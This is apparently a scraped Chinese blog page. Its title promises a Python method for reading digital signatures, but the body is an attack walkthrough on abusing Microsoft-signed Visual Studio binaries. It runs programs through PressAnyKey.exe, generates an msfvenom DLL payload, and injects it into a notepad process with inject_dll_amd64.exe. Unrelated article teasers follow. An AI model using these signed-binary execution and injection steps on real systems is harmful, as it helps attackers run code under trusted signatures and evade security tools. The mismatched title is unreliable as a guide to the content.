Python获取exe或dll的数字签名
feilongw 2025-04-15 18:07 13 浏览
有趣的命令行系列又来了,这次带来了两个新的命令,是安装visual studio ide时,勾选了nodejs和python才有的。
第一个命令是
Microsoft.NodejsTools.PressAnyKey.exe,默认目录是在C:\Program Files (x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\NodeJsTools\NodeJsTools。微软的IDE下的工具当然带有微软的数字签名了。
这个命令比较简单,默认语法是:
Microsoft.NodejsTools.PressAnyKey.exe normal
你可以把
Microsoft.NodejsTools.PressAnyKey.exe拷贝出来单独用,像我是放在了D盘。
运行计算器:
Microsoft.NodejsTools.PressAnyKey.exe normal 1 calc.exe
第二个命令是inject_dll_amd64.exe,当然同目录下也有个inject_dll_x86.exe。目录在
C:\Program Files(x86)\Microsoft Visual Studio\\Community\Common7\IDE\Extensions\Microsoft\Python\Core\debugpy\_vendored\pydevd\pydevd_attach_to_process
看名字就知道是用来dll inject的,也是带有微软签名的。我们先来生成一个执行计算器的dll。我生成的是位的。
msfvenom -a x64 --platform windows -p windows/x64/exec CMD="calc.exe" -f dll -o calc.dll
我们来执行看一下。
taskkill /f /im notepad.exe //杀死记事本进程
notepad && tasklist |find "notepad.exe" //找到记事本进程的pid。
inject_dll_amd64.exe D:\dll_inject_vs_binaries\calc64.dll
//calc64.dll就是kali下生成的,我改了个名。是刚启动的记事本的pid。
我也试过用别的进程的pid,用了chome的没成功,用记事本的成功了。
当然你用inject_dll_x86.exe就要用位的dll了。最后再附一个如何用go语言写dllmain样式的dll代码吧。
编译方法是go build -ldflags "-s -w" -buildmode=c-shared -o calc.dll 1.go。
相关推荐
- 13款用于Web的流行HTML5视频播放器
-
开源项目评测之Html5视频播放器推荐Web项目开发中视频播放是一个非常常见的需求,需要播放器能够支持pc端和移动端的使用,并且支持常见的视频格式。我们从github上精选了5款优秀的Html5播放...
- [ 渗透入门篇 ] 渗透行业必备术语大集合(全 -- 五万字总结)
-
反渗透系统常用术语(1)淡水:又称渗透水、产品水,是反渗透系统的净化水。(2)供水:又称给水,是进入反渗透膜系统的供给水源。(3)浓水:又称盐水,是反渗透系统的浓缩废液。(4)半透膜:允许溶液中溶剂透...
- java-verbose是什么意思 java -verbose
-
灵魂拷问:为什么short、byte会被提升为int?boolean到底多大?为什么short、byte会被提升为int?在学习Java语法的时候,知道short、byte、byte类型在做运...
- Android Hanlder 揭密之路- 深入理解异步消息传递机制Looper、Handler、Message三者关系
-
Handler知识点梳理:Handler、Looper以及Message三者之间的关系前言Handler、Looper以及Message之间的关系,概括性来说,Looper负责的是创建一个Me...
- csdn freemarker jquery 预览word
-
高质量人才助推高质量发展——西安市高新区“精益创业带动就业示范行动”系列活动西安市高新区“精益创业带动就业示范行动”系列活动已于8月日在高新区软件新城正式启动。本周五(8月日)上午点分,系列活动之“直...
- android 修改菜单menu背景
-
教你把手机的状态栏和通知栏改造成安卓L风格说道颜值,就得吐槽一下安卓及一下的版本了。原生真的是丑,丑到没朋友。到了安卓,谷歌终于大刀阔斧的对安卓的颜值进行了大动刀。【下拉通知栏】那么,安卓有没有办法搞...
- DCDC架构中 dcdc类型(dcdc的主要作用)
-
DC-DC工作原理,看完你就懂了上篇文章说了LDO的原理,那本篇就来说一下DCDC的工作原理吧。开关电源:是一种高频化电能转换装置,其主要利用电力电子开关器件(如晶体管、MOS管、可控晶闸管等),通过...
- getPath(),getAbsolutePath(),getCanonicalPath() 区别
-
java获取文件路径1.前言Java开发中我们经常要获取文件的路径,比如读取配置文件等等。今天我们就关于文件的路径和如何读取文件简单地探讨一下。2.文件的路径文件的路径通常有相对路径与绝对...
- android 多任务键app后台重新唤起生命周期 安卓任务管理器快捷键
-
好用的备忘录待办提醒APP任务管理工具怎么选?在这个信息高速流通的时代,选择一款合适的任务管理应用变得尤为关键。一个好的任务管理工具不仅能帮助我们更好地规划时间、提升效率,还能在快节奏的生活中保持条...
- android数据包下载地址 数据包apk
-
《地牢猎手5》安卓怎么下载APK数据包下载万众期待的地牢猎手5终于推出啦,此次Gameloft在安卓平台首发推出,不过目前谷歌商店还未提供正式下载数据包,不过不用担心,蚕豆网小编为大家带来了地牢猎手...
- 51c大模型~合集24(c5.0模型)
-
北大校友打造的个智能体「我的世界」,背后原理揭晓了!来源:量子位北大校友打造的个智能体「我的世界」,背后原理揭晓了!团队全新公开页技术报告,详尽解密AI智能体如何产生专业化分工、社交互动、甚至传播虚拟...
- ao3archive of own our如何使用
-
肖战ao3事件始末揭秘ao3是啥意思肖战粉丝举报AO3为什么惹众怒3月4日凌晨2时分,肖战工作室再次发表声明:肖战海外社交账号已无法正常登陆,任何更改均非本人及工作人员操作,后续动作均与肖战本人无关...
- ansible变量运算 ansible查看变量的命令
-
Python中的Ansible库在Python中集成Ansible功能,主要通过以下两种方式实现,结合官方库和核心API可满足不同场景的自动化需求:一、AnsibleRunner库Ansible官方...
- 25个简单shell例子(shell实例讲解)
-
shell编程其实真的很简单(一)如今,不会Linux的程序员都不意思说自己是程序员,而不会shell编程就不能说自己会Linux。说起来似乎shell编程很屌啊,然而不用担心,其实shell编程真的...
- ByConity ELT 测试体验
-
字节跳动开源云原生数仓引擎ByConity技术详解与应用导读本文介绍字节跳动开源的云原生数仓引擎,ByConity。主要包含四个主题:1.ByConity产生背景2.ByConity设计...
- 一周热门
- 最近发表
-
- 13款用于Web的流行HTML5视频播放器
- [ 渗透入门篇 ] 渗透行业必备术语大集合(全 -- 五万字总结)
- java-verbose是什么意思 java -verbose
- Android Hanlder 揭密之路- 深入理解异步消息传递机制Looper、Handler、Message三者关系
- csdn freemarker jquery 预览word
- android 修改菜单menu背景
- DCDC架构中 dcdc类型(dcdc的主要作用)
- getPath(),getAbsolutePath(),getCanonicalPath() 区别
- android 多任务键app后台重新唤起生命周期 安卓任务管理器快捷键
- android数据包下载地址 数据包apk
- 标签列表
-